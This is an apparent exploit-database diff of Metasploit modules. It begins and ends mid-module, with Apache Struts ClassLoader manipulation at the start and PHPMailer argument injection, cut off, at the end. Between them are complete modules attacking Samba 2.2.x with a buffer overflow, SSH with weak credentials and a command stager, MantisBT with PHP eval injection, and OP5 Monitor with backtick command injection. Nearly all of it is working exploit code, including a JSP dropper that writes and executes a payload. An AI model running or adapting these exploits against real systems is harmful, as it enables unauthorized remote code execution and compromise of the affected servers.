'Arch' => ARCH_X86,
'Platform' => 'linux'
}
],
['Windows',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
}
],
['Windows / Tomcat 6 & 7 and GlassFish 4 (Remote SMB Resource)',
{
'Arch' => ARCH_JAVA,
'Platform' => 'win'
}
]
],
'DisclosureDate' => 'Mar 06 2014',
'DefaultTarget' => 1))
register_options(
[
Opt::RPORT(8080),
OptEnum.new('STRUTS_VERSION', [ true, 'Apache Struts Framework version', '2.x', ['1.x','2.x']]),
OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/struts2-blank/example/HelloWorld.action"]),
OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 10])
], self.class)
deregister_options('SHARE', 'FILE_NAME', 'FOLDER_NAME', 'FILE_CONTENTS')
end
def jsp_dropper(file, exe)
dropper = <<-eos
<%@ page import=\"java.io.FileOutputStream\" %>
<%@ page import=\"sun.misc.BASE64Decoder\" %>
<%@ page import=\"java.io.File\" %>
<% FileOutputStream oFile = new FileOutputStream(\"#{file}\", false); %>
<% oFile.write(new sun.misc.BASE64Decoder().decodeBuffer(\"#{Rex::Text.encode_base64(exe)}\")); %>
<% oFile.flush(); %>
<% oFile.close(); %>
<% File f = new File(\"#{file}\"); %>
<% f.setExecutable(true); %>
<% Runtime.getRuntime().exec(\"./#{file}\"); %>
eos
dropper
end
def dump_line(uri, cmd = '')
res = send_request_cgi({
'uri' => uri,
'encode_params' => false,
'vars_get' => {
cmd => ''
},
'version' => '1.1',
'method' => 'GET'
})
res
end
def modify_class_loader(opts)
cl_prefix =
case datastore['STRUTS_VERSION']
when '1.x' then "class.classLoader"
when '2.x' then "class['classLoader']"
end
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s),
'version' => '1.1',
'method' => 'GET',
'vars_get' => {
"#{cl_prefix}.resources.context.parent.pipeline.first.directory" => opts[:directory],
"#{cl_prefix}.resources.context.parent.pipeline.first.prefix" => opts[:prefix],
"#{cl_prefix}.resources.context.parent.pipeline.first.suffix" => opts[:suffix],
"#{cl_prefix}.resources.context.parent.pipeline.first.fileDateFormat" => opts[:file_date_format]
}
})
res
end
def check_log_file(hint)
uri = normalize_uri("/", @jsp_file)
print_status("Waiting for the server to flush the logfile")
10.times do |x|
select(nil, nil, nil, 2)
# Now make a request to trigger payload
vprint_status("Countdown #{10-x}...")
res = dump_line(uri)
# Failure. The request timed out or the server went away.
fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") if res.nil?
# Success if the server has flushed all the sent commands to the jsp file
if res.code == 200 && res.body && res.body.to_s =~ /#{hint}/
print_good("Log file flushed at http://#{peer}/#{@jsp_file}")
return true
end
end
false
end
# Fix the JSP payload to make it valid once is dropped
# to the log file
def fix(jsp)
output = ""
jsp.each_line do |l|
if l =~ /<%.*%>/
output << l
elsif l =~ /<%/
next
elsif l=~ /%>/
next
elsif l.chomp.empty?
next
else
output << "<% #{l.chomp} %>"
end
end
output
end
def create_jsp
if target['Arch'] == ARCH_JAVA
jsp = fix(payload.encoded)
else
if target['Platform'] == 'win'
payload_exe = Msf::Util::EXE.to_executable_fmt(framework, target.arch, target.platform, payload.encoded, "exe-small", {:arch => target.arch, :platform => target.platform})
else
payload_exe = generate_payload_exe
end
payload_file = rand_text_alphanumeric(4 + rand(4))
jsp = jsp_dropper(payload_file, payload_exe)
register_files_for_cleanup(payload_file)
end
jsp
end
def exploit
if target.name =~ /Remote SMB Resource/
begin
Timeout.timeout(datastore['SMB_DELAY']) { super }
rescue Timeout::Error
# do nothing... just finish exploit and stop smb server...
end
else
class_loader_exploit
end
end
# Used with SMB targets
def primer
self.file_name << '.jsp'
self.file_contents = payload.encoded
print_status("JSP payload available on #{unc}...")
print_status("Modifying Class Loader...")
send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s),
'version' => '1.1',
'method' => 'GET',
'vars_get' => {
'class[\'classLoader\'].resources.dirContext.docBase' => "\\\\#{srvhost}\\#{share}"
}
})
jsp_shell = target_uri.path.to_s.split('/')[0..-2].join('/')
jsp_shell << "/#{self.file_name}"
print_status("Accessing JSP shell at #{jsp_shell}...")
send_request_cgi({
'uri' => normalize_uri(jsp_shell),
'version' => '1.1',
'method' => 'GET',
})
end
def class_loader_exploit
prefix_jsp = rand_text_alphanumeric(3+rand(3))
date_format = rand_text_numeric(1+rand(4))
@jsp_file = prefix_jsp + date_format + ".jsp"
# Modify the Class Loader
print_status("Modifying Class Loader...")
properties = {
:directory => 'webapps/ROOT',
:prefix => prefix_jsp,
:suffix => '.jsp',
:file_date_format => date_format
}
res = modify_class_loader(properties)
unless res
fail_with(Failure::TimeoutExpired, "#{peer} - No answer")
end
# Check if the log file exists and has been flushed
unless check_log_file(normalize_uri(target_uri.to_s))
fail_with(Failure::Unknown, "#{peer} - The log file hasn't been flushed")
end
register_files_for_cleanup(@jsp_file)
# Prepare the JSP
print_status("Generating JSP...")
jsp = create_jsp
# Dump the JSP to the log file
print_status("Dumping JSP into the logfile...")
random_request = rand_text_alphanumeric(3 + rand(3))
uri = normalize_uri('/', random_request)
jsp.each_line do |l|
unless dump_line(uri, l.chomp)
fail_with(Failure::Unknown, "#{peer} - Missed answer while dumping JSP to logfile...")
end
end
# Check log file... enjoy shell!
check_log_file(random_request)
# No matter what happened, try to 'restore' the Class Loader
properties = {
:directory => '',
:prefix => '',
:suffix => '',
:file_date_format => ''
}
modify_class_loader(properties)
end
end

153
platforms/multiple/remote/41693.rb Executable file
View file

@ -0,0 +1,153 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::SMB::Client
def initialize(info = {})
super(update_info(info,
'Name' => 'Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow',
'Description' => %q{
This module attempts to exploit a buffer overflow vulnerability present in
versions 2.2.2 through 2.2.6 of Samba.
The Samba developers report this as:
"Bug in the length checking for encrypted password change requests from clients."
The bug was discovered and reported by the Debian Samba Maintainers.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2002-1318' ],
[ 'OSVDB', '14525' ],
[ 'BID', '6210' ],
[ 'URL', 'http://www.samba.org/samba/history/samba-2.2.7a.html' ]
],
'Privileged' => true,
'Platform' => 'linux',
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'MinNops' => 512,
},
'Targets' =>
[
[ "Samba 2.2.x Linux x86",
{
'Arch' => ARCH_X86,
'Platform' => 'linux',
'Rets' => [0x01020304, 0x41424344],
},
],
],
'DisclosureDate' => 'Apr 7 2003'
))
register_options(
[
Opt::RPORT(139)
], self.class)
end
def exploit
# 0x081fc968
pattern = Rex::Text.pattern_create(12000)
pattern[532, 4] = [0x81b847c].pack('V')
pattern[836, payload.encoded.length] = payload.encoded
# 0x081b8138
connect
smb_login
targ_address = 0xfffbb7d0
#
# Send a NTTrans request with ParameterCountTotal set to the buffer length
#
subcommand = 1
param = ''
body = ''
setup_count = 0
setup_data = ''
data = param + body
pkt = CONST::SMB_NTTRANS_PKT.make_struct
self.simple.client.smb_defaults(pkt['Payload']['SMB'])
base_offset = pkt.to_s.length + (setup_count * 2) - 4
param_offset = base_offset
data_offset = param_offset + param.length
pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT
pkt['Payload']['SMB'].v['Flags1'] = 0x18
pkt['Payload']['SMB'].v['Flags2'] = 0x2001
pkt['Payload']['SMB'].v['WordCount'] = 19 + setup_count
pkt['Payload'].v['ParamCountTotal'] =12000
pkt['Payload'].v['DataCountTotal'] = body.length
pkt['Payload'].v['ParamCountMax'] = 1024
pkt['Payload'].v['DataCountMax'] = 65504
pkt['Payload'].v['ParamCount'] = param.length
pkt['Payload'].v['ParamOffset'] = param_offset
pkt['Payload'].v['DataCount'] = body.length
pkt['Payload'].v['DataOffset'] = data_offset
pkt['Payload'].v['SetupCount'] = setup_count
pkt['Payload'].v['SetupData'] = setup_data
pkt['Payload'].v['Subcommand'] = subcommand
pkt['Payload'].v['Payload'] = data
self.simple.client.smb_send(pkt.to_s)
ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT)
#
# Send a NTTrans secondary request with the magic displacement
#
param = pattern
body = ''
data = param + body
pkt = CONST::SMB_NTTRANS_SECONDARY_PKT.make_struct
self.simple.client.smb_defaults(pkt['Payload']['SMB'])
base_offset = pkt.to_s.length - 4
param_offset = base_offset
data_offset = param_offset + param.length
pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT_SECONDARY
pkt['Payload']['SMB'].v['Flags1'] = 0x18
pkt['Payload']['SMB'].v['Flags2'] = 0x2001
pkt['Payload']['SMB'].v['WordCount'] = 18
pkt['Payload'].v['ParamCountTotal'] = param.length
pkt['Payload'].v['DataCountTotal'] = body.length
pkt['Payload'].v['ParamCount'] = param.length
pkt['Payload'].v['ParamOffset'] = param_offset
pkt['Payload'].v['ParamDisplace'] = targ_address
pkt['Payload'].v['DataCount'] = body.length
pkt['Payload'].v['DataOffset'] = data_offset
pkt['Payload'].v['Payload'] = data
self.simple.client.smb_send(pkt.to_s)
ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT_SECONDARY)
handler
end
end

147
platforms/multiple/remote/41694.rb Executable file
View file

@ -0,0 +1,147 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'net/ssh'
class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::SSH
attr_accessor :ssh_socket
def initialize
super(
'Name' => 'SSH User Code Execution',
'Description' => %q{
This module connects to the target system and executes the necessary
commands to run the specified payload via SSH. If a native payload is
specified, an appropriate stager will be used.
},
'Author' => ['Spencer McIntyre', 'Brandon Knight'],
'References' =>
[
[ 'CVE', '1999-0502'] # Weak password
],
'License' => MSF_LICENSE,
'Privileged' => true,
'DefaultOptions' =>
{
'PrependFork' => 'true',
'EXITFUNC' => 'process'
},
'Payload' =>
{
'Space' => 4096,
'BadChars' => "",
'DisableNops' => true
},
'Platform' => %w{ linux osx python },
'Targets' =>
[
[ 'Linux x86',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
],
[ 'Linux x64',
{
'Arch' => ARCH_X64,
'Platform' => 'linux'
}
],
[ 'OSX x86',
{
'Arch' => ARCH_X86,
'Platform' => 'osx'
}
],
[ 'Python',
{
'Arch' => ARCH_PYTHON,
'Platform' => 'python'
}
]
],
'CmdStagerFlavor' => %w{ bourne echo printf },
'DefaultTarget' => 0,
# For the CVE
'DisclosureDate' => 'Jan 01 1999'
)
register_options(
[
OptString.new('USERNAME', [ true, "The user to authenticate as.", 'root' ]),
OptString.new('PASSWORD', [ true, "The password to authenticate with.", '' ]),
OptString.new('RHOST', [ true, "The target address" ]),
Opt::RPORT(22)
], self.class
)
register_advanced_options(
[
OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false])
]
)
end
def execute_command(cmd, opts = {})
vprint_status("Executing #{cmd}")
begin
Timeout.timeout(3) do
self.ssh_socket.exec!("#{cmd}\n")
end
rescue ::Exception
end
end
def do_login(ip, user, pass, port)
factory = ssh_socket_factory
opt_hash = {
:auth_methods => ['password', 'keyboard-interactive'],
:port => port,
:use_agent => false,
:config => false,
:password => pass,
:proxy => factory,
:non_interactive => true
}
opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
begin
self.ssh_socket = Net::SSH.start(ip, user, opt_hash)
rescue Rex::ConnectionError
fail_with(Failure::Unreachable, 'Disconnected during negotiation')
rescue Net::SSH::Disconnect, ::EOFError
fail_with(Failure::Disconnected, 'Timed out during negotiation')
rescue Net::SSH::AuthenticationFailed
fail_with(Failure::NoAccess, 'Failed authentication')
rescue Net::SSH::Exception => e
fail_with(Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")
end
if not self.ssh_socket
fail_with(Failure::Unknown, 'Failed to start SSH socket')
end
return
end
def exploit
do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])
print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending stager...")
if target['Platform'] == 'python'
execute_command("python -c \"#{payload.encoded}\"")
else
execute_cmdstager({:linemax => 500})
end
self.ssh_socket.close
end
end

369
platforms/multiple/webapps/41685.rb Executable file
View file

@ -0,0 +1,369 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
include REXML
def initialize(info = {})
super(update_info(info,
'Name' => 'MantisBT XmlImportExport Plugin PHP Code Injection Vulnerability',
'Description' => %q{
This module exploits a post-auth vulnerability found in MantisBT versions 1.2.0a3 up to 1.2.17 when the Import/Export plugin is installed.
The vulnerable code exists on plugins/XmlImportExport/ImportXml.php, which receives user input through the "description" field and the "issuelink" attribute of an uploaded XML file and passes to preg_replace() function with the /e modifier.
This allows a remote authenticated attacker to execute arbitrary PHP code on the remote machine.
This version also suffers from another issue. The import page is not checking the correct user level
of the user, so it's possible to exploit this issue with any user including the anonymous one if enabled.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Egidio Romano', # discovery http://karmainsecurity.com
'Juan Escobar <eng.jescobar[at]gmail.com>', # module development @itsecurityco
'Christian Mehlmauer'
],
'References' =>
[
['CVE', '2014-7146'],
['CVE', '2014-8598'],
['URL', 'https://www.mantisbt.org/bugs/view.php?id=17725'],
['URL', 'https://www.mantisbt.org/bugs/view.php?id=17780']
],
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Generic (PHP Payload)', {}]],
'DisclosureDate' => 'Nov 8 2014',
'DefaultTarget' => 0))
register_options(
[
OptString.new('USERNAME', [ true, 'Username to authenticate as', 'administrator']),
OptString.new('PASSWORD', [ true, 'Pasword to authenticate as', 'root']),
OptString.new('TARGETURI', [ true, 'Base directory path', '/'])
], self.class)
end
def get_mantis_version
xml = Document.new
xml.add_element(
"soapenv:Envelope",
{
'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance",
'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema",
'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/",
'xmlns:man' => "http://futureware.biz/mantisconnect"
})
xml.root.add_element("soapenv:Header")
xml.root.add_element("soapenv:Body")
body = xml.root.elements[2]
body.add_element("man:mc_version",
{ 'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/" }
)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'api', 'soap', 'mantisconnect.php'),
'ctype' => 'text/xml; charset=UTF-8',
'headers' => { 'SOAPAction' => 'http://www.mantisbt.org/bugs/api/soap/mantisconnect.php/mc_version'},
'data' => xml.to_s
})
if res && res.code == 200
match = res.body.match(/<ns1:mc_versionResponse.*><return xsi:type="xsd:string">(.+)<\/return><\/ns1:mc_versionResponse>/)
if match && match.length == 2
version = match[1]
print_status("Detected Mantis version #{version}")
return version
end
end
print_status("Can not detect Mantis version")
return nil
end
def check
version = get_mantis_version
return Exploit::CheckCode::Unknown if version.nil?
gem_version = Gem::Version.new(version)
gem_version_introduced = Gem::Version.new('1.2.0a3')
gem_version_fixed = Gem::Version.new('1.2.18')
if gem_version < gem_version_fixed && gem_version >= gem_version_introduced
return Msf::Exploit::CheckCode::Appears
else
return Msf::Exploit::CheckCode::Safe
end
end
def do_login()
# check for anonymous login
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'login_anon.php')
})
# if the redirect contains a username (non empty), anonymous access is enabled
if res && res.redirect? && res.redirection && res.redirection.query =~ /username=[^&]+/
print_status('Anonymous access enabled, no need to log in')
session_cookie = res.get_cookies
else
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'login_page.php'),
'vars_get' => {
'return' => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import')
}
})
session_cookie = res.get_cookies
print_status('Logging in...')
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'login.php'),
'cookie' => session_cookie,
'vars_post' => {
'return' => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import'),
'username' => datastore['username'],
'password' => datastore['password'],
'secure_session' => 'on'
}
})
fail_with(Failure::NoAccess, 'Login failed') unless res && res.code == 302
fail_with(Failure::NoAccess, 'Wrong credentials') unless res && !res.redirection.to_s.include?('login_page.php')
session_cookie = "#{session_cookie} #{res.get_cookies}"
end
session_cookie
end
def upload_xml(payload_b64, rand_text, cookies, is_check)
if is_check
timeout = 20
else
timeout = 3
end
rand_num = Rex::Text.rand_text_numeric(1, 9)
print_status('Checking XmlImportExport plugin...')
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'plugin.php'),
'cookie' => cookies,
'vars_get' => {
'page' => 'XmlImportExport/import'
}
})
unless res && res.code == 200 && res.body
print_error('Error trying to access XmlImportExport/import page...')
return false
end
if res.body.include?('Plugin is not registered with MantisBT')
print_error('XMLImportExport plugin is not installed')
return false
end
# Retrieving CSRF token
if res.body =~ /name="plugin_xml_import_action_token" value="(.*)"/
csrf_token = Regexp.last_match[1]
else
print_error('Error trying to read CSRF token')
return false
end
# Retrieving default project id
if res.body =~ /name="project_id" value="([0-9]+)"/
project_id = Regexp.last_match[1]
else
print_error('Error trying to read project id')
return false
end
# Retrieving default category id
if res.body =~ /name="defaultcategory">[.|\r|\r\n]*<option value="([0-9])" selected="selected" >\(select\)<\/option><option value="1">\[All Projects\] (.*)<\/option>/
category_id = Regexp.last_match[1]
category_name = Regexp.last_match[2]
else
print_error('Error trying to read default category')
return false
end
# Retrieving default max file size
if res.body =~ /name="max_file_size" value="([0-9]+)"/
max_file_size = Regexp.last_match[1]
else
print_error('Error trying to read default max file size')
return false
end
# Retrieving default step
if res.body =~ /name="step" value="([0-9]+)"/
step = Regexp.last_match[1]
else
print_error('Error trying to read default step value')
return false
end
xml_file = %Q|
<mantis version="1.2.17" urlbase="http://localhost/" issuelink="${eval(base64_decode(#{ payload_b64 }))}}" notelink="~" format="1">
<issue>
<id>#{ rand_num }</id>
<project id="#{ project_id }">#{ rand_text }</project>
<reporter id="#{ rand_num }">#{ rand_text }</reporter>
<priority id="30">normal</priority>
<severity id="50">minor</severity>
<reproducibility id="70">have not tried</reproducibility>
<status id="#{ rand_num }">new</status>
<resolution id="#{ rand_num }">open</resolution>
<projection id="#{ rand_num }">none</projection>
<category id="#{ category_id }">#{ category_name }</category>
<date_submitted>1415492267</date_submitted>
<last_updated>1415507582</last_updated>
<eta id="#{ rand_num }">none</eta>
<view_state id="#{ rand_num }">public</view_state>
<summary>#{ rand_text }</summary>
<due_date>1</due_date>
<description>{${eval(base64_decode(#{ payload_b64 }))}}1</description>
</issue>
</mantis>
|
data = Rex::MIME::Message.new
data.add_part("#{ csrf_token }", nil, nil, "form-data; name=\"plugin_xml_import_action_token\"")
data.add_part("#{ project_id }", nil, nil, "form-data; name=\"project_id\"")
data.add_part("#{ max_file_size }", nil, nil, "form-data; name=\"max_file_size\"")
data.add_part("#{ step }", nil, nil, "form-data; name=\"step\"")
data.add_part(xml_file, "text/xml", "UTF-8", "form-data; name=\"file\"; filename=\"#{ rand_text }.xml\"")
data.add_part("renumber", nil, nil, "form-data; name=\"strategy\"")
data.add_part("link", nil, nil, "form-data; name=\"fallback\"")
data.add_part("on", nil, nil, "form-data; name=\"keepcategory\"")
data.add_part("#{ category_id }", nil, nil, "form-data; name=\"defaultcategory\"")
data_post = data.to_s
print_status('Sending payload...')
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import_action'),
'cookie' => cookies,
'ctype' => "multipart/form-data; boundary=#{ data.bound }",
'data' => data_post
}, timeout)
if res && res.body && res.body.include?('APPLICATION ERROR')
print_error('Error on uploading XML')
return false
end
# request above will time out and return nil on success
return true
end
def exec_php(php_code, is_check = false)
print_status('Checking access to MantisBT...')
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
})
fail_with(Failure::NoAccess, 'Error accessing MantisBT') unless res && (res.code == 200 || res.redirection)
# remove comments, line breaks and spaces of php_code
payload_clean = php_code.gsub(/(\s+)|(#.*)/, '')
# clean b64 payload
while Rex::Text.encode_base64(payload_clean).include?('=')
payload_clean = "#{ payload_clean } "
end
payload_b64 = Rex::Text.encode_base64(payload_clean)
rand_text = Rex::Text.rand_text_alpha(5, 8)
cookies = do_login()
res_payload = upload_xml(payload_b64, rand_text, cookies, is_check)
return unless res_payload
# When a meterpreter session is active, communication with the application is lost.
# Must login again in order to recover the communication. Thanks to @FireFart for figure out how to fix it.
cookies = do_login()
print_status("Deleting issue (#{ rand_text })...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'my_view_page.php'),
'cookie' => cookies
})
unless res && res.code == 200
print_error('Error trying to access My View page')
return false
end
if res.body =~ /title="\[@[0-9]+@\] #{ rand_text }">0+([0-9]+)<\/a>/
issue_id = Regexp.last_match[1]
else
print_error('Error trying to retrieve issue id')
return false
end
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'bug_actiongroup_page.php'),
'cookie' => cookies,
'vars_get' => {
'bug_arr[]' => issue_id,
'action' => 'DELETE',
},
})
if res && res.body =~ /name="bug_actiongroup_DELETE_token" value="(.*)"\/>/
csrf_token = Regexp.last_match[1]
else
print_error('Error trying to retrieve CSRF token')
return false
end
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'bug_actiongroup.php'),
'cookie' => cookies,
'vars_post' => {
'bug_actiongroup_DELETE_token' => csrf_token,
'bug_arr[]' => issue_id,
'action' => 'DELETE',
},
})
if res && res.code == 302 || res.body !~ /Issue #{ issue_id } not found/
print_status("Issue number (#{ issue_id }) removed")
else
print_error("Removing issue number (#{ issue_id }) has failed")
return false
end
# if check return the response
if is_check
return res_payload
else
return true
end
end
def exploit
get_mantis_version
unless exec_php(payload.encoded)
fail_with(Failure::Unknown, 'Exploit failed, aborting.')
end
end
end

104
platforms/multiple/webapps/41686.rb Executable file
View file

@ -0,0 +1,104 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'OP5 license.php Remote Command Execution',
'Description' => %q{
This module exploits an arbitrary root command execution vulnerability in the
OP5 Monitor license.php. Ekelow has confirmed that OP5 Monitor versions 5.3.5,
5.4.0, 5.4.2, 5.5.0, 5.5.1 are vulnerable.
},
'Author' => [ 'Peter Osterberg <j[at]vel.nu>' ],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2012-0261'],
['OSVDB', '78064'],
['URL', 'http://secunia.com/advisories/47417/'],
],
'Privileged' => true,
'Payload' =>
{
'DisableNops' => true,
'Space' => 1024,
'BadChars' => '`\\|',
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'perl ruby python',
}
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [[ 'Automatic', { }]],
'DisclosureDate' => 'Jan 05 2012',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(443),
OptString.new('URI', [true, "The full URI path to license.php", "/license.php"]),
], self.class)
end
def check
vprint_status("Attempting to detect if the OP5 Monitor is vulnerable...")
vprint_status("Sending request to https://#{rhost}:#{rport}#{datastore['URI']}")
# Try running/timing 'ping localhost' to determine is system is vulnerable
start = Time.now
data = 'timestamp=1317050333`ping -c 10 127.0.0.1`&action=install&install=Install';
res = send_request_cgi({
'uri' => normalize_uri(datastore['URI']),
'method' => 'POST',
'proto' => 'HTTPS',
'data' => data,
'headers' =>
{
'Connection' => 'close',
}
}, 25)
elapsed = Time.now - start
if elapsed >= 5
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
print_status("Sending request to https://#{rhost}:#{rport}#{datastore['URI']}")
data = 'timestamp=1317050333`' + payload.encoded + '`&action=install&install=Install';
res = send_request_cgi({
'uri' => normalize_uri(datastore['URI']),
'method' => 'POST',
'proto' => 'HTTPS',
'data' => data,
'headers' =>
{
'Connection' => 'close',
}
}, 25)
if(not res)
if session_created?
print_status("Session created, enjoy!")
else
print_error("No response from the server")
end
return
end
end
end

104
platforms/multiple/webapps/41687.rb Executable file
View file

@ -0,0 +1,104 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'OP5 welcome Remote Command Execution',
'Description' => %q{
This module exploits an arbitrary root command execution vulnerability in
OP5 Monitor welcome. Ekelow AB has confirmed that OP5 Monitor versions 5.3.5,
5.4.0, 5.4.2, 5.5.0, 5.5.1 are vulnerable.
},
'Author' => [ 'Peter Osterberg <j[at]vel.nu>' ],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2012-0262'],
['OSVDB', '78065'],
['URL', 'http://secunia.com/advisories/47417/'],
],
'Privileged' => true,
'Payload' =>
{
'DisableNops' => true,
'Space' => 1024,
'BadChars' => '`\\|',
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'perl ruby python',
}
},
'Platform' => %w{ linux unix },
'Arch' => ARCH_CMD,
'Targets' => [[ 'Automatic', { }]],
'DisclosureDate' => 'Jan 05 2012',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(443),
OptString.new('URI', [true, "The full URI path to /op5config/welcome", "/op5config/welcome"]),
], self.class)
end
def check
vprint_status("Attempting to detect if the OP5 Monitor is vulnerable...")
vprint_status("Sending request to https://#{rhost}:#{rport}#{datastore['URI']}")
# Try running/timing 'ping localhost' to determine is system is vulnerable
start = Time.now
data = 'do=do=Login&password=`ping -c 10 127.0.0.1`';
res = send_request_cgi({
'uri' => normalize_uri(datastore['URI']),
'method' => 'POST',
'proto' => 'HTTPS',
'data' => data,
'headers' =>
{
'Connection' => 'close',
}
}, 25)
elapsed = Time.now - start
if elapsed >= 5
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
print_status("Sending request to https://#{rhost}:#{rport}#{datastore['URI']}")
data = 'do=do=Login&password=`' + payload.encoded + '`';
res = send_request_cgi({
'uri' => normalize_uri(datastore['URI']),
'method' => 'POST',
'proto' => 'HTTPS',
'data' => data,
'headers' =>
{
'Connection' => 'close',
}
}, 10)
if(not res)
if session_created?
print_status("Session created, enjoy!")
else
print_error("No response from the server")
end
return
end
end
end

126
platforms/multiple/webapps/41688.rb Executable file
View file

@ -0,0 +1,126 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'PHPMailer Sendmail Argument Injection',
'Description' => %q{
PHPMailer versions up to and including 5.2.19 are affected by a
vulnerability which can be leveraged by an attacker to write a file with
partially controlled contents to an arbitrary location through injection
of arguments that are passed to the sendmail binary. This module
writes a payload to the web root of the webserver before then executing
it with an HTTP request. The user running PHPMailer must have write
access to the specified WEB_ROOT directory and successful exploitation
can take a few minutes.
},
'Author' => [
'Dawid Golunski', # vulnerability discovery and original PoC
'Spencer McIntyre' # metasploit module
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2016-10033'],
['CVE', '2016-10045'],
['EDB', '40968'],
['EDB', '40969'],
['URL', 'https://github.com/opsxcq/exploit-CVE-2016-10033'],
['URL', 'https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html']
],
'DisclosureDate' => 'Dec 26 2016',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Payload' => {'DisableNops' => true},
'Targets' => [
['PHPMailer <5.2.18', {}],
['PHPMailer 5.2.18 - 5.2.19', {}]
],
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'Path to the application root', '/']),
OptString.new('TRIGGERURI', [false, 'Path to the uploaded payload', '']),
OptString.new('WEB_ROOT', [true, 'Path to the web root', '/var/www'])
], self.class)
register_advanced_options(
[
OptInt.new('WAIT_TIMEOUT', [true, 'Seconds to wait to trigger the payload', 300])
], self.class)
end
def trigger(trigger_uri)
print_status("Sleeping before requesting the payload from: #{trigger_uri}")
page_found = false
sleep_time = 10
wait_time = datastore['WAIT_TIMEOUT']
print_status("Waiting for up to #{wait_time} seconds to trigger the payload")
while wait_time > 0
sleep(sleep_time)
wait_time -= sleep_time
res = send_request_cgi(
'method' => 'GET',
'uri' => trigger_uri
)
if res.nil?
if page_found or session_created?
print_good('Successfully triggered the payload')
break
end
next
end
next unless res.code == 200
if res.body.length == 0 and not page_found
print_good('Successfully found the payload')
page_found = true
end
end
end
def exploit
payload_file_name = "#{rand_text_alphanumeric(8)}.php"
payload_file_path = "#{datastore['WEB_ROOT']}/#{payload_file_name}"
if target.name == 'PHPMailer <5.2.18'
